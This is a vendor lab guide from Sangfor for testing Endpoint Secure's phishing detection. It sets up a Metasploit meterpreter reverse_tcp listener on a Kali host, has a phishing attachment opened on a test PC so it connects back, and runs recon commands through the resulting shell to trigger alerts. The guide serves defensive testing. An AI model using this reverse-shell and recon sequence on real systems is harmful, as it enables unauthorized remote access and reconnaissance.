|
Sangfor Endpoint Secure Best Practices: Phishing Detection with Automated Response
Sangfor Technologies Inc.
|
Copyright © Sangfor Technologies Inc. 2023. All rights reserved.
Unless otherwise stated or authorized, Sangfor Technologies Inc. (hereinafter referred to as "Sangfor") and its affiliates reserve all intellectual property rights, including but not limited to copyrights, trademarks, patents, and trade secrets, and related rights to text, images, pictures, photographs, audio, videos, charts, colors, and layouts as presented in or concerning this document and content therein. Without prior written consent of Sangfor, this document and content therein must not be reproduced, forwarded, adapted, modified or displayed or distributed by any other means for any purpose.
Disclaimer
Products, services or features described in this document, whether wholly or in part, may be not within your purchase scope or usage scope. The products, services or features you purchase must be subject to the commercial contract and terms as agreed by you and Sangfor. Unless otherwise provided in the contract, Sangfor disclaims warranties of any kind, either express or implied, for the content of this document.
Due to product version upgrades or other reasons, the content of this document will be updated from time to time. Unless otherwise agreed, this document is used for reference only, and all statements, information, and recommendations therein do not constitute any express or implied warranties.
For technical support, please visit: https://www.sangfor.com/en/about-us/contact-us/technical-support
Send information about errors or any product related problem to tech.support@sangfor.com.
About This Document
This document is the Best Practices of Phishing Detection with Automated Response of Sangfor Endpoint Secure.
Intended Audience
This document is intended for:
l All Users
|
English Icon |
Description |
|
|
Indicates an imminently hazardous situation which, if not avoided, will result in death or serious injury. |
|
|
Indicates a potentially hazardous situation which, if not avoided, could result in death or serious injury. |
|
|
Indicates a hazardous situation, which if not avoided, could result in minor or moderate injury. |
|
|
Indicates a hazardous situation, which if not avoided, could result in settings failing to take effect, equipment damage, or data loss. NOTICE addresses practices not related to personal injury. |
|
|
Calls attention to important information, best practices, and tips. NOTE addresses information not related to personal injury or equipment damage. |
|
Date |
Change Description |
|
Dec. 14, 2023 |
This is the first release of this document. |
Contents
1
Phishing and web intrusion attacks are two threat actors' most common methods to infect user systems and steal confidential data. It is important to have capabilities to detect and protect against these attacks. Endpoint Secure has developed stronger detection capabilities to detect attacks originating from Emails and Instant Messaging (IM). When an unsuspecting user downloads and executes a malicious attachment from their Email or IM, Endpoint Secure monitors all files and processes related to the malicious executable.
Users can visualize the attack in Advanced Threats and understand how the threat started and what it is trying to achieve. To help users mitigate these attacks quickly, users can configure Endpoint Secure to respond automatically to block and prevent them once they have been assessed as malicious.
15. Use the Kali image uploaded in the attachment and create the system. Do not modify the IP address because Kali's address has been fixed as 192.168.20.71 in the test sample. The account and password for the Kali login are root/@support123.
16. Open the email sample in the attachment with Foxmail.
17. Please ensure that the test PC can access Kali's IP address and that Kali can access the test PC.
Step 1. Navigate to Policies > Realtime Protection, disable Realtime File Protection, and Check the Enable auto-fix of phishing attacks checkbox.
Step 2. Disable Hacktool Protection.
Step 1. Run MSF on Kali and listen for connections from the remote end. Please enter the following commands manually. You can use the tab key to complete the commands. Do not copy and paste from the document.
msfconsole
use exploit/multi/handler
set paylaod windows/meterpreter/reverse_tcp
set lhost 192.168.20.71
set lport 8888
run
|
Command |
Function |
|
msfconsole |
Initial msfconsole |
|
set lhost 192.168.20.71 |
fill in the IP address of Kali |
Step 2. Open the email and the attachment on the test PC.
Step 3. The malware will disguise itself as a normal email. The malware will be executed and connected to Kali's IP address by opening the attachment.
Step 4. After executing the phishing sample, it was successfully launched on Kali. You can use the shell command in MSF to enter the PC's command line.
Step 5. In the Endpoint Secure Manager console, go to Detection and Response > Intrusion Detection > Advanced Threats > Alert Mode, and you can see the following alert.
Step 1. Enter the shell command to enter the CMD of the test PC.
Step 2. Execute the following command:
|
Command |
Function |
|
whoami |
Get the username of the current logged-in user. |
|
ipconfig |
Display network configuration information, such as IP address, subnet mask, etc. |
|
systeminfo |
Display detailed information about the system, such as operating system version, installation date, etc. |
|
wmic process get |
Get information about the running process. |
Step 3. Endpoint Secure detected the above behavior and generated the following alerts.
Step 4. At the same time, the security incident has been automatically fixed.
Step 5. In the meantime, you can view the attack chain.
Please clean up the files after the test.
Usually, attachments exist in the following paths: C:\Users\Administrator\AppData\Roaming\Foxmail7\
If you want to generate a new testing event, please restart the PC and delete the above two files.
|
|
;}.cls-2{fill:%230868f7;}.cls-3{fill:url(%23未命名的渐变_44);}.cls-4{fill:%23333;}%3c/style%3e%3clinearGradient%20id='未命名的渐变_8'%20x1='33.73'%20y1='100.61'%20x2='-0.03'%20y2='-1.06'%20gradientUnits='userSpaceOnUse'%3e%3cstop%20offset='0'%20stop-color='%237ae9fb'/%3e%3cstop%20offset='0.67'%20stop-color='%232b90f8'/%3e%3cstop%20offset='1'%20stop-color='%230868f7'/%3e%3c/linearGradient%3e%3clinearGradient%20id='未命名的渐变_44'%20x1='27.86'%20y1='18.67'%20x2='68.36'%20y2='22.22'%20gradientUnits='userSpaceOnUse'%3e%3cstop%20offset='0'%20stop-color='%235ac7f2'/%3e%3cstop%20offset='1'%20stop-color='%230868f7'/%3e%3c/linearGradient%3e%3c/defs%3e%3cpath%20class='cls-1'%20d='M29,28.74V81.91l-9.51-3.68v0L8.52,74A7.17,7.17,0,0,1,4,67.32V24.54A3.76,3.76,0,0,1,9.08,21Z'/%3e%3cpath%20class='cls-2'%20d='M68.09,78.07a13.15,13.15,0,0,1-17.9,12.06L29,81.91h0V28.74L50.19,37A13.17,13.17,0,0,0,68.08,25.3h0Z'/%3e%3cpath%20class='cls-3'%20d='M68.08,25.3a13.19,13.19,0,0,1-6.73,10.87A13.09,13.09,0,0,1,50.19,37L29,28.74V6A3.76,3.76,0,0,1,34.1,2.52l25.59,9.91A13.22,13.22,0,0,1,68.08,25.3Z'/%3e%3cpath%20class='cls-4'%20d='M129.06,81.76a4.33,4.33,0,0,1-3.19-1.31,4.4,4.4,0,0,1-1.31-3.24V56.86H97.65V77.21a4.36,4.36,0,0,1-1.35,3.2A4.68,4.68,0,0,1,93,81.76a4.32,4.32,0,0,1-3.19-1.31,4.37,4.37,0,0,1-1.32-3.24V27.27A4.58,4.58,0,0,1,89.83,24a4.59,4.59,0,0,1,7.82,3.27V48.15h26.91V27.27A4.58,4.58,0,0,1,125.91,24a4.59,4.59,0,0,1,7.82,3.27V77.21a4.37,4.37,0,0,1-1.36,3.2A4.65,4.65,0,0,1,129.06,81.76Z'/%3e%3cpath%20class='cls-4'%20d='M163.77,81.66c-6.57,0-11.76-1.92-15.44-5.7s-5.54-9.07-5.54-15.74a26.76,26.76,0,0,1,2.09-10.43,17.72,17.72,0,0,1,6.67-8.06,19.15,19.15,0,0,1,10.68-2.95,19,19,0,0,1,10.46,2.8,18.7,18.7,0,0,1,6.55,7.36,22.53,22.53,0,0,1,2.36,10.28A4.51,4.51,0,0,1,177,63.77H152.23a10.8,10.8,0,0,0,3.49,6.65c2,1.68,4.88,2.52,8.66,2.52a22.25,22.25,0,0,0,7.54-1.21c.74-.3,1.55-.67,2.37-1.07a3.75,3.75,0,0,1,1.84-.4,4.09,4.09,0,0,1,3,1.15,4,4,0,0,1,1.12,3,4.38,4.38,0,0,1-2.58,3.82,32.34,32.34,0,0,1-6.36,2.61A28.67,28.67,0,0,1,163.77,81.66ZM172.4,55.9a9.72,9.72,0,0,0-1.63-4.56A9.9,9.9,0,0,0,167,48a10.38,10.38,0,0,0-4.64-1.14,12,12,0,0,0-4.77,1.06,9.54,9.54,0,0,0-4.89,5.66,11.78,11.78,0,0,0-.51,2.3Z'/%3e%3cpath%20class='cls-4'%20d='M193,81.64a4.49,4.49,0,0,1-4.51-4.55V27.28A4.58,4.58,0,0,1,189.84,24a4.48,4.48,0,0,1,3.28-1.36A4.36,4.36,0,0,1,196.35,24a4.46,4.46,0,0,1,1.31,3.31V77.09a4.34,4.34,0,0,1-1.35,3.2A4.67,4.67,0,0,1,193,81.64Z'/%3e%3cpath%20class='cls-4'%20d='M263.79,81.71a5.7,5.7,0,0,1-4.2-1.74,5.76,5.76,0,0,1-1.73-4.19V27.37a4.58,4.58,0,0,1,1.35-3.27A4.59,4.59,0,0,1,267,27.37V72.53h24a4.58,4.58,0,0,1,3.27,7.82A4.66,4.66,0,0,1,291,81.71Z'/%3e%3cpath%20class='cls-4'%20d='M424.48,81.74a4.71,4.71,0,0,1-2.71-.88,5.43,5.43,0,0,1-1-1l-.07-.09-12.41-17-5.41,5v9.44a4.31,4.31,0,0,1-1.36,3.19,4.66,4.66,0,0,1-3.3,1.36A4.29,4.29,0,0,1,395,80.42a4.36,4.36,0,0,1-1.32-3.23V27.37A4.58,4.58,0,0,1,395,24.1a4.52,4.52,0,0,1,6.58.12,4.54,4.54,0,0,1,1.24,3.15V56.31l17.72-16.38.05,0a4.8,4.8,0,0,1,2.94-1.11,4.4,4.4,0,0,1,3.27,1.2,4.57,4.57,0,0,1,1.2,3.27,4.44,4.44,0,0,1-.77,2.33,7.45,7.45,0,0,1-1.43,1.65l-11,9.64,13.34,17.68a5,5,0,0,1,1,2.71,4.12,4.12,0,0,1-1.36,3.24A4.64,4.64,0,0,1,424.48,81.74Z'/%3e%3cpath%20class='cls-4'%20d='M317.93,81.76a21.5,21.5,0,1,1,21.17-21.5A21.37,21.37,0,0,1,317.93,81.76Zm0-34.1a12.61,12.61,0,1,0,12.42,12.6A12.52,12.52,0,0,0,317.93,47.66Z'/%3e%3cpath%20class='cls-4'%20d='M212.18,101.22a4.12,4.12,0,0,1-3.05-1.26,4.17,4.17,0,0,1-1.26-3.1V43.34a4.37,4.37,0,0,1,1.3-3.14,4.26,4.26,0,0,1,3.13-1.3,4.19,4.19,0,0,1,3.1,1.26,4.32,4.32,0,0,1,1.26,3.16,20.77,20.77,0,0,1,13-4.54,21.51,21.51,0,0,1,0,43,20.51,20.51,0,0,1-13-4.57V96.86a4.15,4.15,0,0,1-1.3,3.06A4.5,4.5,0,0,1,212.18,101.22Zm17.43-53.63c-6.23,0-12.93,4.11-12.93,12.72a12.73,12.73,0,0,0,25.46,0A12.71,12.71,0,0,0,229.61,47.59Z'/%3e%3cpath%20class='cls-4'%20d='M365.76,81.76a21.5,21.5,0,1,1,21.18-21.5A21.37,21.37,0,0,1,365.76,81.76Zm0-34.1a12.61,12.61,0,1,0,12.42,12.6A12.52,12.52,0,0,0,365.76,47.66Z'/%3e%3c/svg%3e)